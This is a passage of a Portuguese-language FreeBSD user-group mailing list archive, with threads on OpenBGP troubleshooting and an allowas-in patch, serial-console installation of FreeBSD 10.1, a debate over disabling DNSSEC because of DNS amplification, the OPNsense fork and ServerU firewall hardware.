 O OpenVPN é bem prático. Você pode criar um instalador com o arquivo de
 conf. e automatizar o processo.
 Outra opção que pode considerar é o L2TP.

 --
 Tales

 -
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

 E Usuário tem algum 

Re: [FUG-BR] Freebsd 10.1 com OpenBGP 5.2

[Evandro Nunes]

nao tem log nenhum do bgpd?
tem certeza que fica idle? nao vai nem pra active?
esta -stable?

muito estranho nao haver erro nem tentativa da sessao ir pra active e
voltar pra idle
cola sua conf ai


2015-04-18 15:56 GMT-03:00 Fernando Perassoli :

> Boa tarde.
>
> Tenho um Servidor Freebsd 9.1 com Openbgp 4.9, neste tenho configurado 4
> sessões de transisto full routing e uma sessão de blackhole em loopback
> tudo funcionando normalmente, como este servidor tem um hardware bem
> modesto e meu trafego esta bem alto, comprei um novo servidor da intel para
> substitui-lo, neste instalei o Freebsd 10.1 com Openbgp 5.2, configurei as
> sessões BGP e para minha surpresa a sessão de blackhole não subiu, as de
> transito estão tudo ok, mas a de blackhole fica somente no estado de IDLE.
> Conferi todas as configurações do novo servidor com Freebsd 10.1 e não
> encontrei nada de errado, isto comparando com as configurações do servidor
> antigo com Freebsd 9.1
> Gostaria de saber se o Freebsd 10.1 apresenta algum problema com relação
> ao uso de interfaces loopback, no meu caso para sessões BGP, pois meu
> servidor antigo com Freebsd 9.1 funciona normalmente.
>
> Desde já agradeço.
>
> Att"
>
> Fernando
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] OpenBGP allowas-in

[Evandro Nunes]

On Sat, Jan 24, 2015 at 7:24 PM, ae moura > wrote:

> Uau! patrick!Funcionou direitinho. Quase perfeito exceto que tive que
> reiniciar o servico, veja abaixo.Segundo patch seu que funciona muito bem
> no OpenBGP tomara que coloque logo no ports.
> Não entendi porém seu comentário no patch:
> " Cisco, Juniper and other BGP routing daemons do offer the samefeature,
> sometimes with explicit control of how many times the ASnumber is accepted
> in the as-path. It does not help, the wrong setupwill loop anyway,
> therefore we just allow it any number of times."
> Qual é a diferenca na implementacao?Outra coisa coloquei allowas-in no
> peer e dei reload, nao funcionou. Mas quando reiniciei o openbgpd
> funcionou, era isso mesmo esperado?
>
> > From: eks...@freebsdbrasil.com.br
> 
> > To: freebsd@fug.com.br
> 
> > Date: Sat, 24 Jan 2015 02:47:00 -0200
> > Subject: [FUG-BR] OpenBGP allowas-in
> >
> > Botei a feature no OpenBGP. O patch[1] funciona OK no OpenBSD tambem,
> > alem do FreeBSD claro (e ate aplicou na versão do Linux mas como n
> > uso, só vi que aplicou clean...). Se alguem preferir usar direto no
> > ports ao invés de aplicar o patch na mão o diff está pronto[2] pra
> > enviar um PR pro ports também, mas vou enviar depois de 1 semana de
> > testes.
> > Todo teste é bem-vindo.
> >
> > [1]
> http://main.bh.freebsdbrasil.com.br/~eksffa/l/local-patch-openbgpd-allowas-in.c>
> [2]
> http://main.bh.freebsdbrasil.com.br/~eksffa/l/ports_net_openbgpd-allowas-in.diff
> >
> >   Allow the AS path of a received route to contain the recipient BGP
> > speaker's AS number any number of times, avoiding Route Decision
> > Engine loop prevention for this peer. This is a feature that should
> > rarely be needed. Usually the need for this feature suggests something
> > wrong on the current BGP setup. However in some particular setups it's
> > just needed, and can be used without breaking BGP or adding loops.
> > Cisco, Juniper and other BGP routing daemons do offer the same
> > feature, sometimes with explicit control of how many times the AS
> > number is accepted in the as-path. It does not help, the wrong setup
> > will loop anyway, therefore we just allow it any number of times. On
> > bgpd.conf(5), use it on a per neighbor/group basis: group "my_peers" {
> > allowas-in (...) neighbor $a_peer { (...) allowas-in } } Shamely, I
> > didn't patch bgpd.conf(5), therefore it's more than welcome. --
> > Patrick Tracanelli
>


tinha um cara ai.
acho que da Dafiti Calcados... buscando um allowas-in no OpenBGP.
tomara que sirva pra ele também... :)



>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Contabem de prefixos do bgpctl no OpenBgpd

[Evandro Nunes]

que contagem é essa que voce fez?
na tabela rib ou na fib?
você pode ter recebido XYZ prefixos e filtrado-os ou apenas instalado na
FIB a melhor seleção que é o normal a não se que voce mudou seu freebsd
(tipo, com radix multipath).

2015-01-16 17:34 GMT-02:00 Thiago Andrighetti :

> Olá, tenho uma dúvida faz um tempinho e não achei nada...Hoje um
> full-routing tem em torno de 525000 prefixos.As vezes quando executo o
> bgpctl show, aparece por exemplo assim:
> root@portal1:~ # bgpctl show
> Neighbor   ASMsgRcvdMsgSent  OutQ Up/Down
> State/PrfRcvd
> Peer1  112211 627728  10326 0 2d03h55m 534190
> Peer2  112211 461978  10501 0 14:43:23 1055619
> root@portal1:~ #
>
> O peer2 esta mostrando 1055619 prefixos rsrs.
> Mas ao fazer uma contagem com o wc, vem os 525 mil normal.
> Alguém sabe o por que isso acontece?
>
>
> Obrigado.
>  --
> Thiago Andrighetti de Pádua
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Instalação FreeBSD-10.1-RELEASE via serial

[Evandro Nunes]

2015-01-17 12:42 GMT-02:00 Tales Rodarte :

>Bom dia,
>Evandro, obrigado pela dica. Fiz os dois procedimentos e ambos
>funcionaram perfeitamente.
>att,
>

legal tales.



>Tales
>On 16-01-2015 12:03, Evandro Nunes wrote:
>
> 2015-01-16 11:35 GMT-02:00 Tales Rodarte [1]:
>
>
> Senhores, bom dia.
>
> Preciso instalar via serial console uma imagem do FreeBSD-10.1-RELEASE
> em um compact flash de um roteador modelo Power Router 732.
>
> Porém todas as imagens que encontrei, não veem com a opção
> console="comconsole" habilitada.  Fiz alguns testes tentando editar o
> arquivo ISO, mas não tive sucesso. Segui a documentação
> [2]https://www.freebsd.org/doc/handbook/install-advanced.html e alguns
> outros tutorias mas o boot via usb/CD não funciona corretamente.
>
> Realizei a instalação usando outro hardware e um leitor usb, e após a
> instalação ativei a opção console="comconsole". Funcionou mas ao dar
> boot, o sistema apresenta o seguinte erro;
>
>
> é porque voce fez uma gambiarra de instalar em outra maquina antes.
> dai o /etc/fstab dessa instalação ja está com um device name (ad0s1b pelo
> seu log) diferente do que é no seu tal power router então boota nesse power
> router e ve como o disco é reconhecido na saída do dmesg no momento do
> boot, deve ser ada0, ada1, da1, ou outra coisa, essa outra coisa na
> partição "b" deve ser seu / no /etc/fstab
>
> quando o freebsd pedir mount root digite
>
> ufs:/dev/disco_identificadoXa ou ufs:/dev/disco_identificadoXb (b ou a é o
> slice, deve ser o mesmo que tem no seu fstab).
>
> mas se quiser evitar isso, seu power router deve ser capaz de bootar USB
> certo?
> faz assim baixa a imagem usb do freebsd (memstick)
>
> boota em qualquer máquina com o próprio pendrive e joga pra rw:
>
> mount -u -o rw /
>
> e configura seu /boot/loader.conf e /etc/ttys conforme instruções da
> serverU:
>
> [3]http://www.serveru.us/pt/doc/console
>
> CONFIGURANDO PARA BOOT POR CONSOLE
> FREEBSD
> ou se preferir monta seu pendrive noutro freebsd (pode ser virtualbox) e
> edita no /mnt/etc/ttys e /mnt/boot/loader.conf conforme sugestão do proprio
> site da serverU
>
> pronto seu pendrive vai bootar normalmente e com console ativo agora
>
> a diferença do pendrive pro CD é que no freebsd a imagem do pendrive não é
> ISO9660 (cd-rom) como nos linux. é uma ".img" com file system UFS. dai voce
> pode jogar pra read+write, o que não é possível em uma imagem ISO que é
> sempre read only mesmo em mídia RW.
>
>
>
>
>
> Trying to mount root from ufs:/dev/ad0s1b
> ROOT MOUNT ERROR:
> If you have invalid mount options, reboot, and first try the following
> from
> the loader prompt:
>
>  set vfs.root.mountfrom.options=rw
>
> and then remove invalid mount options from /etc/fstab.
>
> Loader variables:
> vfs.root.mountfrom=ufs:/dev/da0s1a
> vfs.root.mountfrom.options=rw
>
> Manual root filesystem specification:
>   :  Mount  using filesystem 
>eg. ufs:/dev/da0s1a
>eg. cd9660:/dev/acd0
>This is equivalent to: mount -t cd9660 /dev/acd0 /
>
>   ?  List valid disk boot devices
>  Abort manual input
>
> Não tenho muito experiencia com sistemas BSD, ai estou apanhando um
> pouco pra realizar a instalação.
>
> Att,
>
> Tales Rodarte
>
>
>
>
> -
> Histórico: [4]http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: [5]https://www.fug.com.br/mailman/listinfo/freebsd
>
>
>
> -
> Histórico: [6]http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: [7]https://www.fug.com.br/mailman/listinfo/freebsd
>
> References
>
>1. mailto:talesroda...@gmail.com
>2. https://www.freebsd.org/doc/handbook/install-advanced.html
>3. http://www.serveru.us/pt/doc/console
>4. http://www.fug.com.br/historico/html/freebsd/
>5. https://www.fug.com.br/mailman/listinfo/freebsd
>6. http://www.fug.com.br/historico/html/freebsd/
>7. https://www.fug.com.br/mailman/listinfo/freebsd
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] DevOps

[Evandro Nunes]

2015-01-15 12:17 GMT-02:00 Luiz Gustavo S. Costa <
luizgust...@luizgustavo.pro.br>:

> 2015-01-15 12:06 GMT-02:00 Fabricio Lima :
>
> > Caros colegas admins, quero compartilhar uma frase 'bonita' q vi hj no
> > parachoque de um caminhao:
> >
> >
> > Old-style system administrators may be disappearing in the face of
> > automation and cloud computing, but operations have become more
> significant
> > than ever. As this O'Reilly Radar Report explains, we're moving into a
> more
> > complex arrangement known as "DevOps."
> >
> >
> > Nós (como comunidade bsd) precisamos desenvolver/portar algo tipo o
> > Spacewalk para suportar BSD.
> >
> > (o q primeiramente pede um amadurecimento do port do puppet)
> >
> > [ ]'s
> > Fabricio Lima
> > When your hammer is C++, everything begins to look like a thumb.
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>
> Uso com muito sucesso o conjunto Puppet+Foreman em um ambiente heterogêneo
> que tem bastante Freebsd no meio. E tenho ótimas experiências com ele.
>
> O que tá difícil é achar gente no mercado com perfil devops, ou seja, que
> saiba lógica de programação com infraestrutura.
>


mas DevOps não é uma pessoa.
nem o perfil de uma pessoa.
é plural não singular.
DevOps é uma equipe de operação multidisciplinar, envolve engenharia,
desenvolvimento, arquitetura, qualidade, entrega e operação da tecnologia
(sysadmin).
não é o sysadmin virando deveops.

você não contrata um DevOp, exceto no Brasil onde DeveOp é uma evolução do
prévio "Ninja" .
em qualquer outro lugar sério DeveOps é plural e é uma equipe.

não um sysadmin super sayajim que evoluiu pra sysadmin + engenheiro de sw +
developer + arquiteto + QA + outros super poderes.
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Instalação FreeBSD-10.1-RELEASE via serial

[Evandro Nunes]

2015-01-16 11:35 GMT-02:00 Tales Rodarte :

> Senhores, bom dia.
>
> Preciso instalar via serial console uma imagem do FreeBSD-10.1-RELEASE
> em um compact flash de um roteador modelo Power Router 732.
>
> Porém todas as imagens que encontrei, não veem com a opção
> console="comconsole" habilitada.  Fiz alguns testes tentando editar o
> arquivo ISO, mas não tive sucesso. Segui a documentação
> https://www.freebsd.org/doc/handbook/install-advanced.html e alguns
> outros tutorias mas o boot via usb/CD não funciona corretamente.
>
> Realizei a instalação usando outro hardware e um leitor usb, e após a
> instalação ativei a opção console="comconsole". Funcionou mas ao dar
> boot, o sistema apresenta o seguinte erro;
>

é porque voce fez uma gambiarra de instalar em outra maquina antes.
dai o /etc/fstab dessa instalação ja está com um device name (ad0s1b pelo
seu log) diferente do que é no seu tal power router então boota nesse power
router e ve como o disco é reconhecido na saída do dmesg no momento do
boot, deve ser ada0, ada1, da1, ou outra coisa, essa outra coisa na
partição "b" deve ser seu / no /etc/fstab

quando o freebsd pedir mount root digite

ufs:/dev/disco_identificadoXa ou ufs:/dev/disco_identificadoXb (b ou a é o
slice, deve ser o mesmo que tem no seu fstab).

mas se quiser evitar isso, seu power router deve ser capaz de bootar USB
certo?
faz assim baixa a imagem usb do freebsd (memstick)

boota em qualquer máquina com o próprio pendrive e joga pra rw:

mount -u -o rw /

e configura seu /boot/loader.conf e /etc/ttys conforme instruções da
serverU:

http://www.serveru.us/pt/doc/console

CONFIGURANDO PARA BOOT POR CONSOLE
FREEBSD
ou se preferir monta seu pendrive noutro freebsd (pode ser virtualbox) e
edita no /mnt/etc/ttys e /mnt/boot/loader.conf conforme sugestão do proprio
site da serverU

pronto seu pendrive vai bootar normalmente e com console ativo agora

a diferença do pendrive pro CD é que no freebsd a imagem do pendrive não é
ISO9660 (cd-rom) como nos linux. é uma ".img" com file system UFS. dai voce
pode jogar pra read+write, o que não é possível em uma imagem ISO que é
sempre read only mesmo em mídia RW



>
> > Trying to mount root from ufs:/dev/ad0s1b
> > ROOT MOUNT ERROR:
> > If you have invalid mount options, reboot, and first try the following
> > from
> > the loader prompt:
> >
> >  set vfs.root.mountfrom.options=rw
> >
> > and then remove invalid mount options from /etc/fstab.
> >
> > Loader variables:
> > vfs.root.mountfrom=ufs:/dev/da0s1a
> > vfs.root.mountfrom.options=rw
> >
> > Manual root filesystem specification:
> >   :  Mount  using filesystem 
> >eg. ufs:/dev/da0s1a
> >eg. cd9660:/dev/acd0
> >This is equivalent to: mount -t cd9660 /dev/acd0 /
> >
> >   ?  List valid disk boot devices
> >  Abort manual input
>
> Não tenho muito experiencia com sistemas BSD, ai estou apanhando um
> pouco pra realizar a instalação.
>
> Att,
>
> Tales Rodarte
>
>
>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Free DNS host, alguém recomenda ?

[Evandro Nunes]

2015-01-07 19:59 GMT-02:00 Eduardo Schoedler :

> Em 7 de janeiro de 2015 19:50, Evandro Nunes 
> escreveu:
>
> > 2015-01-07 14:14 GMT-02:00 Eduardo Schoedler :
> >
> > > Em 6 de janeiro de 2015 15:42, Evandro Nunes  >
> > > escreveu:
> > >
> > > > > Não esqueçam de ver se tem DNSSEC.
> > > >
> > > > exatamente
> > > > e se tiver DESLIGA
> > > >
> > >
> > > Pelo contrário, se tiver, LIGA.
> >
> > --
> > > Eduardo Schoedler
> > >
> >
> > rss rs rs
> > por mim desliga
> >
> > em um mundo onde ninguém segue BCP nenhuma
> > ninguém tem filtros ingress mínimos
> > diversas aplicações ainda fazem consultas q=ANY
> > onde milhões de androids infectados são vetores de início de amplificação
> > nesse mundo, eu troco explicitamente a confidencialidade pela
> > disponibilidade
> > e desligo DNSSEC
>
> É, não contribuir só ajuda a piorar.
>

não usar DNSSEC não piora em nada as amplificações
ao contrário ajuda


> Se cada um fizer sua parte, já é algo.
>

eu estou fazendo a minha, não ajudando chin xang xai peis a amplificarem
ataques e me usando pra isso

o djb, autor do qmail, não é das pessoas que mais admiro
inclusive o abandonware do qmail dele é um dos q fazem query type ANY
mas ainda assim se tem um ponto que o DJB tem toda razão do mundo é que
DNSSEC é uma arma na mão de kids

Eu implemento BCPs (principalmente rpf-check, proteção de route engines,
> etc), habilito DNSSEC nos servidores DNS e nunca tive problemas.
>

não ter problemas não é sinônimo de não ser causa de problemas
se isso um dia acontecer talvez você mude de opinião
o proprio DJB em 2009 palestrou e divulgou um paper como amplificar um
trafego astronômico com um shell script,  wget+dig
pouco depois disso vimos o maior ddos da historia contra o spamhaus
foram 90Gbit/s de amplificação DNS causada por diversos servidores, tanto
com recursivo aberto quanto apenas autoritativos, desse trafego segundo a
cloudfare mais de 80% em volume (quantidade não frequência) eram respostas
de consultas DNSSEC nunca feitas pelo spamhaus mas com IP forjado

os problemas que o DNSSEC resolve são de autenticidade, cache poisoning,
SPOF, Random ID Guessing
os problemas que o DNSSEC cria ou exponencialmente amplia são os de
disponibilidade (ou falta dela)
então entre a a escolha de disponibilidade vs autenticidade, cada um faz a
sua, eu fiz a minha
a ampla adoção de DNSSEC não caminha a passos lentos apenas por preguiça e
desleixo dos sysadmins
nem pelo aumento da tarefas operacionais na manutenção do DNS

bancos, sites de e-commerce que priorizarem a autenticidade, que coloquem
DNSSEC
todos os outros 99% do planeta cujo domínio raramente sera usado/evenenado
para ataques de phishing e qualquer outro tipo de fraude que tenha spoofing
como vetor primário de ataque risco, se esses 99% do mundo continuarem sem
DNSSEC o mundo será um lugar mais seguro

enfim, a diferença entre a vacina e o veneno é a dosagem

http://www.internetsociety.org/deploy360/blog/2014/09/cloudflare-re-affirms-goal-of-dnssec-support-by-end-of-2014/
http://london50.icann.org/en/schedule/wed-dnssec/presentation-dnssec-dns-proxying-25jun14-en.pdf
http://cr.yp.to/talks/2009.08.10/slides.pdf
http://dankaminsky.com/2011/01/05/djb-ccc/#dnsamp
https://twitter.com/hashbreaker/status/246746124222865409



>
> --
> Eduardo Schoedler
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Free DNS host, alguém recomenda ?

[Evandro Nunes]

2015-01-07 14:14 GMT-02:00 Eduardo Schoedler :

> Em 6 de janeiro de 2015 15:42, Evandro Nunes 
> escreveu:
>
> > > Não esqueçam de ver se tem DNSSEC.
> >
> > exatamente
> > e se tiver DESLIGA
> >
>
> Pelo contrário, se tiver, LIGA.

--
> Eduardo Schoedler
>

rss rs rs
por mim desliga

em um mundo onde ninguém segue BCP nenhuma
ninguém tem filtros ingress mínimos
diversas aplicações ainda fazem consultas q=ANY
onde milhões de androids infectados são vetores de início de amplificação
nesse mundo, eu troco explicitamente a confidencialidade pela
disponibilidade
e desligo DNSSEC
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Free DNS host, alguém recomenda ?

[Evandro Nunes]

2015-01-06 15:34 GMT-02:00 Eduardo Schoedler :

> Em 6 de janeiro de 2015 15:24, Evandro Nunes 
> escreveu:
>
> > 1) https://www.cloudns.net
> >
> > 2) cloudflare.com/dns
> > se dizem o mais rápido do mundo:
> >
> http://blog.cloudflare.com/cloudflare-fastest-free-dns-among-fastest-dns/
> >
>
> Não esqueçam de ver se tem DNSSEC.
>

exatamente
e se tiver DESLIGA
rsss

afinal creio que o objetivo principal pra hospedar em uma infra de responsa
fora da sua é a disponibilidade


>
> --
> Eduardo Schoedler
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC] Free DNS host, alguém recomenda ?

[Evandro Nunes]

1) https://www.cloudns.net

2) cloudflare.com/dns
se dizem o mais rápido do mundo:
http://blog.cloudflare.com/cloudflare-fastest-free-dns-among-fastest-dns/


2015-01-06 11:21 GMT-02:00 Marcus Grando :

> dns.he.net
>
> Abraços
>
> --
> Marcus Grando
> marcus (at) sbh.eng.br
> mnag (at) FreeBSD.org
> fb.com/marcus.grando
> @marcusgrando
>
> On Tue, Jan 6, 2015 at 11:18 AM, Leonardo Augusto 
> wrote:
>
> > Olá,
> >
> > Preciso um servidor de dns free, para master e slave.
> >
> > Alguém usa algo assim e/ou recomenda algúm ?
> >
> > Abraço
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] fork do pfSense

[Evandro Nunes]

2015-01-06 10:12 GMT-02:00 Rafael Aquino :

>
> - Mensagem original -
> > De: "ae moura" 
> > Para: freebsd@fug.com.br
> > Enviadas: Terça-feira, 6 de janeiro de 2015 9:21:16
> > Assunto: [FUG-BR] fork do pfSense
> >
> > Ontem instalei um fork do pfSense chamado OPNSense.Dizem que é um "fork
> > aprovado" (o que quer que isso signifique).Parece ter participação do
> Scott
> > Ullrich criador do pfSense.
> > Alguém ja testou?O que achou?Instalei, vi diversas diferenças mas alguns
> bugs
> > em Virtualbox.Fiquei receoso em por em produção.Quem ja testou, pra
> opinar?
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>
>
> Bom dia a todos...
>
> Eu não conhecia esta ferramenta, e como fã do PFSense prontamente instalei
> (agora a pouco)
>

eu desconhecia também
instalei para testar, bonito tema mesmo
o restante o que tem parece igual ao pfsense
mas tem pouca coisa
me parece um fork para vender hardware
ou seja diretamente conflitante com o modelo de negocio da netgate rss

Mas até o momento senti falta de um recurso vital: o gerenciador de
> pacotes...
> E também da tradução para português.
>
> No mais, parece bem estável (de novo: são os mesmos recursos do pfsense em
> um FreeBSD 10.0 p15).
>
>
verdade
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sobre o ServerU Netmap L100

[Evandro Nunes]

On Friday, January 2, 2015, Christiano Liberato <
christianoliber...@gmail.com> wrote:

> Liguei para os caras agora e só vi uma desvantagem: não tem fonte
> redundante.
> Mas blza


verdade Mano N tem mesmo
mas nesse preço já é milagre ter 2 bypass
eu comprei uma fonte avulsa caso precise
tem 1 ano N precisei 
eles vendem fonte 48v e 110/220v avulso



> Em 2 de janeiro de 2015 14:12, Evandro Nunes  >
> escreveu:
>
> > On Friday, January 2, 2015, Thiago Rocha  > wrote:
> >
> > > On Jan 2, 2015 12:15 PM, "Christiano Liberato" <
> > > christianoliber...@gmail.com  >
> > > wrote:
> > > >
> > > > Caros,
> > > >
> > > > pesquisando sobre soluções enterprise para firewall, encontrei o
> > ServerU
> > > > Netmap L100, que parece ser uma excelente alternativa.
> > > > No site, pelo menos eu, não vi nada sobre capacidade de disco.
> > > > Onde posso ver isso?
> >
> >
> > no site mesmo fala que suporta 2 discos de 2.5 ou 1 de 3.5 SATA2 e nas
> abas
> > de performance tem performance de disco olha lá
> >
> > mas vem sem HDD/SSD a não ser que você peca
> >
> >
> > >
> > > Vc pode pedir a cotação com o disco que desejar.. HD, SSD..
> > >
> > > Ou pode abrir e colocar vc mesmo , mas vai perder a garantia.
> >
> >
> > não perde a não ser que você faça por conta própria sem avisar ninguém
> > no meu caso foi uma L800 mas eu mesmo coloquei um HDD de 2.5 acompanhado
> > pelo analista deles, Pedro que me fez mostrar por foto como estava tudo
> > ligado antes do power hehehe com a supervisão deles N perde garantia não
> > ele até anotou qual numero do lacre rompido 
> >
> > na hora achei absurdo mas depois pensei quantos imbecis nós já não vimos
> > abrindo hardware e queimando tudo por menos que um HD kkk então nao acho
> > errado não kkk eles só querem supervisionar se não é um imbecil desses
> > abrindo a máquina e estragando tudo  acho que passei no teste kk
> >
> >
> > >
> > > Mas cabe HD de 3,5" e tem um slot mini pci express livre, caso por
> > exemplo
> > > queria um mSata.
> > >
> > > Att.,
> > > >
> > > > Obrigado.
> > > > -
> > > > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> > > -
> > > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> > >
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sobre o ServerU Netmap L100

[Evandro Nunes]

On Friday, January 2, 2015, Thiago Rocha  wrote:

> On Jan 2, 2015 12:15 PM, "Christiano Liberato" <
> christianoliber...@gmail.com >
> wrote:
> >
> > Caros,
> >
> > pesquisando sobre soluções enterprise para firewall, encontrei o ServerU
> > Netmap L100, que parece ser uma excelente alternativa.
> > No site, pelo menos eu, não vi nada sobre capacidade de disco.
> > Onde posso ver isso?


no site mesmo fala que suporta 2 discos de 2.5 ou 1 de 3.5 SATA2 e nas abas
de performance tem performance de disco olha lá

mas vem sem HDD/SSD a não ser que você peca


>
> Vc pode pedir a cotação com o disco que desejar.. HD, SSD..
>
> Ou pode abrir e colocar vc mesmo , mas vai perder a garantia.


não perde a não ser que você faça por conta própria sem avisar ninguém
no meu caso foi uma L800 mas eu mesmo coloquei um HDD de 2.5 acompanhado
pelo analista deles, Pedro que me fez mostrar por foto como estava tudo
ligado antes do power hehehe com a supervisão deles N perde garantia não
ele até anotou qual numero do lacre rompido 

na hora achei absurdo mas depois pensei quantos imbecis nós já não vimos
abrindo hardware e queimando tudo por menos que um HD kkk então nao acho
errado não kkk eles só querem supervisionar se não é um imbecil desses
abrindo a máquina e estragando tudo  acho que passei no teste kk


>
> Mas cabe HD de 3,5" e tem um slot mini pci express livre, caso por exemplo
> queria um mSata.
>
> Att.,
> >
> > Obrigado.
> > -
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Evandro Nunes]

On Saturday, December 27, 2014, Zhu Sha Zang 
wrote:

> Legal saber que a AFA parou de usar Windows 98 como servidor web...
>
>
parou? você quem está dizendo
eu só posso falar pela hospedagem rss




> Att
> :-)
>
> On 12/26/2014 04:02 PM, Evandro Nunes wrote:
> > 2014-12-26 16:47 GMT-02:00 firebits  >:
> >
> >> IMHO
> >>
> >> Acho que seria legal, montar os ambientes em OpenBSD X FreeBSD ou
> FreeBSD
> >> X OpenBSD em PoCs, ativar as features que cada um citou nos emails,
> >> mostrando as defesas e os "bypass" de cada feature.
> >>
> >> Depois menciar situações da vida real (tipo falar do problema e não da
> >> pessoa) e como foi resolvido ou melhorado ou que foi mitigado.
> >>
> >> Ai publicar os Howtos de cada coisa e ver o que é melhorado, o que pode
> ser
> >> melhorado e o que não pode ser melhorado.
> >>
> >> Acho que isso ajuda a melhorar em algo.
> >>
> >> A idéia aqui, da minha parte não é ofender ninguém ou falar merda e
> também
> >> que alguém ou algo foi assim, só acho que seria melhor falarmos mais das
> >> coisas, do que das pessoas.
> >>
> >> Se falei ou falo algo errado ou merda, não me importo que me corrijam,
> até
> >> porque tenho muito que aprender e aprendo muito com as pessoas da lista,
> >> cada um com sua forma ou idéia.
> >>
> >> Novamente, é apenas IMHO.
> >>
> >> @firebitsbr
> >>
> > eu concordo, coloque linux e trusted solaris nesse paper tambem
> > concordo e dou um passo a frente em me candidatar pro hardening do
> freebsd,
> > linux
> > e também do openbsd pois são os 3 sistemas com que trabalho
> > acho que consigo que a afa, aqui em pirassununga, hospede as boxes
> > mas não consigo que a afa ceda as boxes, precisaria de alguém contribuir
> > nao acreio que seja adequado virtualizar também ja que as virtualizacoes
> > gerariam vulnerabilidades adicionais
> >
> > mas no final o resultado, com freebsd e openbsd ao menos, acho q seria o
> > mesmo...
> > um sistema difícil de penetrar, mesmo com acesso local (ssh)
> > mais que uma equipe pra hardening, é importante ter uma equipe pra
> > explorar...
> > algo sob controle e com pessoas escolhidas a dedo pq ninguém quer um kids
> > collection da vida gerando DDoS
> > ja que o objetivo não seria esse e sim testar a resiliência dos sistemas
> e
> > não de sua conectividade
> >
> >
> > Em 26 de dezembro de 2014 13:14, ae moura  >
> >> escreveu:
> >>
> >>>> From: rbga...@gmail.com 
> >>>> Date: Thu, 25 Dec 2014 22:02:46 -0200
> >>>> To: freebsd@fug.com.br 
> >>>> Subject: Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD
> >>>>
> >>>>> On Dec 25, 2014, at 15:17, Vitor Hugo  >
> >> wrote:
> >>>>> Alguém chamado Steve costumava sem bem temperamental e o final dele
> >>> não foi nada agradável.
> >>>> Nem to respondendo direto pra você Vitor, só peguei o seu email pra
> >>> responder na thread.
> >>>> Se algumas das pessoas aqui da FUG gastassem o mesmo tempo e energia
> >> que
> >>> gastam brigando por coisas tão banais pra produzir patches pro
> FreeBSD, a
> >>> comunidade inteira ficaria muito grata. Pena que isso nunca vai
